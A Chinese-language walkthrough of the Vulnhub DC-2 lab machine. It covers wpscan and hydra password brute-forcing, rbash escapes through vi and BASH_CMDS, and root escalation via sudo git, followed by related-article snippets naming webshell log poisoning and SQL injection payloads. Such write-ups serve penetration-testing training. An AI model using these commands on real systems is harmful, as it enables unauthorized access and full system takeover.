Vulnhub靶机:DC2

2024-02-14 08:12
文章标签 vulnhub 靶机 dc2

本文主要是介绍Vulnhub靶机:DC2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:DC2(10.0.2.55)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.55

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:80、7744

在这里插入图片描述

打开网站发现会自动跳转到域名dc-2,在/etc/hosts文件添加一条数据并保存:

10.0.2.55       dc-2

再次访问网站,成功访问,该网站是wordpress框架搭建的

在这里插入图片描述

发现flag1,获得提示使用cewl构造密码字典

在这里插入图片描述

三、漏洞利用

先使用wpscan工具扫描一下,枚举用户名,发现三个用户名:admin、jerry、tom

wpscan --url http://dc-2/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive

在这里插入图片描述

使用cewl工具构造密码字典

cewl http://dc-2/ -w passwd.txt

在这里插入图片描述

使用wpscan工具进行暴力破解得到两组用户名密码:

jerry:adipiscing

tom:parturient

wpscan --url http://dc-2/  -P passwd.txt -U user1.txt

在这里插入图片描述

使用爆破得到的用户名密码登录网站

在这里插入图片描述

发现flag2

在这里插入图片描述
在这里插入图片描述

根据flag2的提示,换另一个切入点,想到靶机还开放了7744端口,可以对这个端口进行暴力破解

hydra -L user1.txt -P passwd.txt ssh://10.0.2.55:7744 -t 64 

在这里插入图片描述

破解得到一组用户名密码:tom:parturient

登录ssh

在这里插入图片描述

四、提权

tom用户的很多命令都被限制了,查看当前目录,发现在usr/bin目录发现存在几个命令的快捷方式,尝试运行这几个命令,发现都可以运行

在这里插入图片描述

可以使用vi进行绕过rbash的限制

vi
:set shell=/bin/bash
:shell

执行命令后发现部分命令可以使用了

在这里插入图片描述

其他的部分命令可以切换目录到/usr/bin/bin,使用./执行

可通过环境变量提权方式,越过rbash限制

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

查看flag3和flag4

less /home/tom/flag3.txt

在这里插入图片描述

less /home/jerry/flag4.txt

在这里插入图片描述

执行命令./find / -perm -u=s -type f 2>/dev/null,查看具有SUID权限的二进制可执行文件,未发现可以用来进行提权的

在这里插入图片描述

执行命令./sudo -l查看一下具有sudo权限的程序,发现不能执行

在这里插入图片描述

切换目录到/bin,使用su命令切换到jerry用户:jerry:adipiscing

cd /bin
./su jerry

在这里插入图片描述

执行命令sudo -l查看一下具有sudo权限的程序,发现可以无密码以root权限运行git

在这里插入图片描述

使用git命令进行提权

sudo git -p help config
!/bin/sh

在这里插入图片描述

获取flag

在这里插入图片描述

这篇关于Vulnhub靶机:DC2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/707957

相关文章

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户

.hackme靶机通关攻略

第一步查找ip 通过御剑扫描到IP进入尝试 成功找到靶场 步骤二来到这个靶场注册登录 进来点一下提交出来书名 只有一个框框那就来试试sql注入 1’ and 1=2 --+ 然后查看数据库 -1' union select database(),2,3 # 查看数据库表名 -1' union select group_concat(table_name),2,3

hackme靶机通关攻略

1、登录靶机,查询是否有注入点 2、判断闭合方式 输入OSINT' and 1=1 # 输入OSINT' and 1=2 # 得出闭合方式为单引号 2、查询数据库名 输入-1' union select database(),2,3 # 3、查询数据库中的表 输入-1' union select group_concat(table_name),2,3 from informa

Vulnhub靶场 | DC系列 - DC9

文章目录 DC-9环境搭建渗透测试端口敲门服务 DC-9 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀k

自搭靶机实现SSH爆破复现记录

编写脚本实现ssh爆破。可使用paramiko、pexpect、pxssh等Python模块进行编写。但在ssh服务端将配置加密方式为非常用加密方式3des-cbc,端口为9981端口。 创建 了一个新的Kali虚拟机作为靶机,使用原本的Kali作为攻击机。 设置一个用户为target1234,用户密码为targetpasswd123。 root用户为kaliTarget: 登录进去后

vulnhub靶场-DC2

一、环境配置 1.下载地址:https://www.vulnhub.com/entry/dc-2,311/ 2.靶场配置:Nat模式   更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了 kali进入编辑模式vim,添加上自己的靶机ip地址保存即可 vim /etc/hosts 3.攻击机:kali ip:192.168.111.12

Vulnhub靶场 | DC系列 - DC8

文章目录 DC-8环境搭建渗透测试 DC-8 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC7

文章目录 DC-7环境搭建渗透测试 DC-7 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC4

文章目录 DC-4环境搭建渗透测试 DC-4 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-4,313/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/

Vulnhub靶场 | DC系列 - DC-3

文章目录 DC-3环境搭建渗透测试 DC-3 环境搭建 靶机镜像下载地址:https://vulnhub.com/entry/dc-32,312/需要将靶机和 kali 攻击机放在同一个局域网里;本实验kali 的 IP 地址:192.168.10.146。 渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~